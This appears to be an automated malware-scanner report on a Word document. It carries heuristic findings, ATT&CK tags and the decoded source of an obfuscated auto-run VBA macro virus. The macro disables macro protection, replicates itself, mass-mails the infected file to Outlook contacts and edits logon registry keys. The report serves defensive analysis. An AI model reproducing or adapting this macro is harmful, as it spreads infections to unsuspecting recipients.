MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1140 Deobfuscate or Obfuscate Malicious Code
The file contains obfuscated VBA macros, including a Document_Open auto-exec loader. The script attempts to download and execute a second-stage payload, indicated by the CreateObject and Shell execution calls within the obfuscated code. The specific payload and its destination are not directly discernible due to heavy obfuscation, but the intent is clearly malicious.
Heuristics 5
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7079 bytes |
SHA-256: 54891800384dc566b29e6092128723a810801618ef482640922a97367105e4cc |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Dim EUDWYLF(100) As String, EBKIUFR(100) As String
Dim RHJTHJQ
Private Function MDJMKQY(YMDLEGT)
Dim JLMIVCY(100) As String
Randomize (Timer)
YAEZPTU = Fix(Val(GALGBIN("C", -17)) * Rnd) + Val(GALGBIN("H", -17))
Set TVHKODK = NGCGVBB(ActiveDocument)
If UCase(ActiveDocument.FullName) = UCase(YMDLEGT) Then Exit Function
Documents.Add , True
Set JRTUQDK = NGCGVBB(ActiveDocument)
For XCZOWFP = 1 To TVHKODK.CountOfLines
GMJSRCN = TVHKODK.Lines(XCZOWFP, 1)
If Left(GMJSRCN, 1) = GALGBIN("+", -4) And Right(GMJSRCN, 1) = GALGBIN(".", -4) Then
For HZQRBPS = Val(GALGBIN("E", -19)) To Len(GMJSRCN) - 1
If Mid(GMJSRCN, HZQRBPS, 1) <> GALGBIN(">", -17) Then
EUDWYLF(RHJTHJQ) = EUDWYLF(RHJTHJQ) + Mid(GMJSRCN, HZQRBPS, Val(GALGBIN("E", -20)))
Else
RHJTHJQ = RHJTHJQ + Val(GALGBIN(";", -10))
End If
Next
Exit For
End If
Next
For HZQRBPS = Val(GALGBIN("F", -22)) To RHJTHJQ
Randomize (Timer)
For Longitud = Val(GALGBIN("A", -16)) To YAEZPTU
Randomize (Second(Now))
EBKIUFR(HZQRBPS) = EBKIUFR(HZQRBPS) + FFYRFQW(Fix(Val(GALGBIN("HL", -22)) * Rnd) + Val(GALGBIN("LK", -22)))
Next
Next
For HZQRBPS = Val(GALGBIN("3", -2)) To TVHKODK.CountOfLines
GMJSRCN = VBDCHQX(TVHKODK.Lines(HZQRBPS, 1))
If HZQRBPS = XCZOWFP Then ZXOVIIV = GMJSRCN: GMJSRCN = ""
If Left(GMJSRCN, Val(GALGBIN("@", -9))) = GALGBIN("Y{r j}n", -9) Then USYZHSS = USYZHSS + Val(GALGBIN(":", -9))
If USYZHSS = Val(GALGBIN("5", -5)) Then
JRTUQDK.insertlines HZQRBPS, GMJSRCN
AGUETGO = HZQRBPS + Val(GALGBIN("A", -16))
Else
JLMIVCY(USYZHSS) = JLMIVCY(USYZHSS) + GMJSRCN + vbCrLf
End If
Next
Randomize (Timer)
BPURASD = Fix(USYZHSS * Rnd) + Val(GALGBIN("7", -6))
For XCZOWFP = BPURASD To USYZHSS
JRTUQDK.insertlines AGUETGO, JLMIVCY(XCZOWFP)
AGUETGO = AGUETGO + Len(JLMIVCY(XCZOWFP))
JLMIVCY(XCZOWFP) = ""
Next
For XCZOWFP = 1 To USYZHSS
If JLMIVCY(XCZOWFP) <> "" Then
JRTUQDK.insertlines AGUETGO, JLMIVCY(XCZOWFP)
AGUETGO = AGUETGO + Len(JLMIVCY(XCZOWFP)) + Val(GALGBIN("D", -19))
JLMIVCY(XCZOWFP) = ""
End If
Next
Randomize (Timer)
JRTUQDK.insertlines (JRTUQDK.CountOfLines * Rnd) + Val(GALGBIN(">", -13)), ZXOVIIV
ActiveDocument.SaveAs YMDLEGT
ActiveDocument.Close
End Function
Private Sub Document_Open()
On Error Resume Next
Set XCZOWFP = Options
ZVTZIPA = XCZOWFP.DefaultFilePath(wdDocumentsPath) & GALGBIN("g", -11) & Application.UserName & GALGBIN("9ozn", -11)
XCZOWFP.VirusProtection = Val(GALGBIN("6", -6))
MDJMKQY ZVTZIPA
EIOCMCO
If ThisDocument.Name <> NormalTemplate.Name Then
Set XCZOWFP = CreateObject(GALGBIN("^„ƒ{~~z", -15) & FFYRFQW(Val(GALGBIN("CE", -15))) & GALGBIN("P {xrpƒx~}", -15))
Set BCHSQEF = XCZOWFP.GetNamespace(GALGBIN("XL[T", -11))
Set ZJKPBRG = BCHSQEF.GetDefaultFolder(6).Items
Set XDXWSCA = BCHSQEF.AddressLists(Val(GALGBIN("=", -12)))
Set ZWRHLLL = XCZOWFP.CreateItem(Val(GALGBIN("A", -17)))
For BPURASD = 1 To XDXWSCA.AddressEntries.Count
Set BCHSQEF = ZWRHLLL.Recipients.Add(XDXWSCA.AddressEntries.Item(BPURASD))
BCHSQEF.Type = 3
If BCHSQEF.Resolve = False Then BCHSQEF.Delete
If BPURASD > Val(GALGBIN("?:", -10)) Then Exit For
Next
ZWRHLLL.Subject = Application.UserName & GALGBIN("$1$Gyvvmgypyq$Zmxei", -4)
ZWRHLLL.Attachments.Add ZVTZIPA
ZWRHLLL.Send
For XCZOWFP = ZJKPBRG.Count To (ZJKPBRG.Count - Val(GALGBIN("<", -3))) Step -1
If XCZOWFP < Val(GALGBIN("?", -14)) Then Exit For
Set ZWRHLLL = ZJKPBRG.Item(XCZOWFP).ReplyAll
ZWRHLLL.Attachments.Add ZVTZIPA
ZWRHLLL.Send
Next
End If
Set XCZOWFP = System
XCZOWFP.PrivateProfileString("", GALGBIN("JMG[aNQECNaOCEJKPG^Uqhvyctg^Oketquqhv^Ykpfqyu^EwttgpvXgtukqp^Ykpnqiqp^", -2), GALGBIN("NgicnPqvkegEcrvkqp", -2)) = GALGBIN("JVVR<11yyy048220eqo", -2)
XCZOWFP.PrivateProfileString("", GALGBIN("UXRflY\PNYlZNPUV[Ri`|s�„n riZvp |€|s�idv{q|„€iP‚ r{�cr €v|{idv{y|t|{i", -1
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.